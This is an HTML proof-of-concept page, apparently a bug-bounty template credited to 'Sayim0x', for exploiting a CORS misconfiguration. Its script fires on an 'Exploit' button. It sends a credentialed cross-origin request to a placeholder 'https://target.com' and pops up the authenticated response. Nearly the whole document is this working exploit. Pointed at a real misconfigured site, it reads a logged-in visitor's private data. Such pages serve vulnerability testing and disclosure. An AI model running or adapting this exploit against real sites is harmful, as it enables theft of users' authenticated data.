<!DOCTYPE html>
<html>
         <head>
                  <title>CORS POC</title>
                  <script>
                          function cors(){
                                  var xhttp = new XMLHttpRequest();
                                          xhttp.onreadystatechange = function(){
                                                  if (this.readyState == 4 && this.status ==200){
                                                          document.getElementById("demo").innerHTML = alert(this.responseText);
                                                  }
                                           }
                                           xhttp.open("GET", "https://target.com", true);
                                           xhttp.withCredentials = true;
                                           xhttp.send();
                                        }                                        
                  </script>
                  <style type="text/css">
                            .button {
                                    background-color: black;
                                    border: 3 px solid darkgray;
                                    color:  white;
                                    padding: 15px 32px;
                                    text-align: center;
                                    transition-duration: 0.4s;
                                    text-decoration: none;
                                    display: inline-block;
                                    font-size: 50px;
                                    border-radius: 50%;
                            }
                            .button:hover{
                                    background-color: gray;
                                    color: darkred;
                            }
                  </style>
         </head>
         <body style="background-color: darkgrey;">
                <center>
                        <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
                        <h1 style="font-size: 80px;">CORS POC by Sayim0x</h1>
                        <h1 style="font-size: 50px;">Click on Exploit Button</h1>
                        <div id="demo">
                                <button class="button" type="button" onclick="cors()">Exploit</button>
                        </div>
                        
                        <h2 style="font-size: 80px;">Affeceted URL: https://target.com</h2>
                </center>
        </body>
</html>
